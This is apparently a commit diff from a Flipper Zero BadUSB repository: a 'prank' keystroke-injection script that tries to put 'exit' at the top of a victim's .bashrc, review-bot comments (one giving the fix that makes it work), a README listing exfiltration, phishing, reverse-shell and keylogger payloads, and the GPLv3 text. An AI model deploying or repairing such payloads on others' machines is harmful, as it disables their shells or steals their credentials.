- \[1] [Kali Linux 2020.4 switches the default shell from Bash to ZSH
](https://www.bleepingcomputer.com/news/linux/kali-linux-20204-switches-the-default-shell-from-bash-to-zsh/)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
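Review bot: this README is a verbatim copy of the Kali variant's, Kali-specific paragraphs included, and it repeats the same two empty "[this one here]()" links. Add the directory links, and either trim the text to the Bash/`.bashrc` case this payload actually handles or keep one shared README and point both payload folders at it; the "*How it works on Kali Linux...*" caption above the GIF is also misleading for the Linux variant.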
@@ -0,0 +1,29 @@
REM ############################################################
REM # #
REM # Title : This damn shell doesn't work, SO SAD! :C #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Prank #
REM # Target : Linux #
REM # #
REM ############################################################
REM Requirements:
REM - Nothing <3
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING echo "exit" > .tmp
ENTER
DELAY 500
STRING cat .bashrc >> .tmp
ENTER
DELAY 500
STRING mv .tmp >> .bashrc
ENTER
DELAY 500
ALT F4
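Review bot: `mv .tmp >> .bashrc` has the same defect as the Kali variant: `>> .bashrc` is taken by the shell as an append redirection, so `mv` gets a single operand and fails, `.bashrc` is not modified, and `.tmp` is left in the home directory. The intended command is `mv .tmp .bashrc`. As with the other variant, every path is relative, so the `REM` header should state that the terminal is expected to open in the user's home directory.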
@@ -0,0 +1,88 @@
# My Flipper Shits - GNU/Linux
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) [![GitHub Sponsor](https://img.shields.io/github/sponsors/aleff-github?label=Sponsor&logo=GitHub&style=for-the-badge)](https://github.com/sponsors/aleff-github) [![Licence](https://img.shields.io/badge/Licence-GPLv3-%239e264c?style=for-the-badge)](https://github.com/aleff-github/my-flipper-shits/blob/main/LICENCE)
* [Disclaimer](#disclaimer)
* [PlugAndPlay (PAP) Legend](#plugandplay-pap-legend)
* [Payloads](#payloads)
* [Videos](#videos)
* [FAQs](#faqs)
* [Credits](#credits)
* [Donations](#donations)
## Disclaimer
<div align=center>
<img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/DISCLAIMER.png" width="600" />
</div>
## PlugAndPlay (PAP) Legend
- 🟢 Totally - You must do nothing
- 🟡 Partial - Just something like a Dropbox Token or Discord Webhook...
- 🔴 Manual effort request
## Payloads
|System|Category|Name|PAP|
|--|--|--|--|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE)|🔴|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|🔴|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Process Info - Linux](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateProcessInfo_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Network Traffic](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateNetworkTraffic_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Linux Documents](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateDocumentsFolder_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Linux Logs](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateLogFiles_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Network Configuration](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateNetworkConfiguration_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Email And Password By Phising](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateEmailAndPasswordByPhising_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Sudo Password By Phishing](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateSudoPasswordByPhising_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate WiFi Passwords](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateWiFiPasswords_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Photos Through Shell](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltratePhotosThroughShell)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Phising|[Standard Phishing Attack](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Phising/StandardPhishingAttack_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Phising|[Standard Phishing Payload Using kdialog](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Phising/StandardPhishingPayloadUsingKdialog_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Set An Arbitrary And Persistent Tor Circuit](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Exploiting An Executable File](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ExploitingAnExecutableFile)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change MAC Address](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeMacAddress_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Set Arbitrary VPN](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/SetArbitraryVPN_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change Network Configuration](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeNetworkConfiguration_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Edit The Default Real App With An Arbitrary](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Edit_The_Default_Real_App_With_An_Arbitrary)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change Git Remote Link](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeGitRemoteLink)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Persistent Reverse Shell - Telegram Based](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Persistent_Reverse_Shell-Telegram_Based)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Telegram Persistent Connection Linux](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Telegram_Persistent_Connection_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Persistent Keylogger - Telegram Based](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Persistent_Keylogger-Telegram_Based)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Defend yourself against AtlasVPN bugdoor](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Defend_yourself_against_AtlasVPN_bugdoor)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)**KDE**|Prank|[Change Desktop Wallpaper](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/ChangeDesktopWallpaper_LinuxKDE)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Send Telegram Messages](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/SendTelegramMessages_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Change The App That Will Be Runned](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/Change_The_App_That_Will_Be_Runned)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Send Email Through Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/SendEmailThroughThunderbird)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[(Kali Linux) This_damn_shell_doesn_t_work___so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-KALI)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[(Linux) This_damn_shell_doesn_t_work___so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-LINUX)|🟢|
|//|Prank|[Flipper Zero GIF](img/gif)|🟢|
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/github.png width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/linkedin.png width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
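Review bot: spelling in the *Payloads* table: "Indicent Response" (two rows) should be "Incident Response", and "Phising" should be "Phishing" in the Category column and in the "Exfiltrate Email And Password By Phising" entry; the folder names inside the URLs (`GNU-Linux/Phising/...`) presumably have to match what is on disk, but the display text need not repeat the typo. The first row's link ends in `_CVE-2023-20198_and_CVE`, which looks truncated against its title; verify that the path resolves. The kdialog phishing payload is listed here under Phishing while its own README in this commit carries a different category line, so the two should be reconciled.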
@@ -0,0 +1,674 @@
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
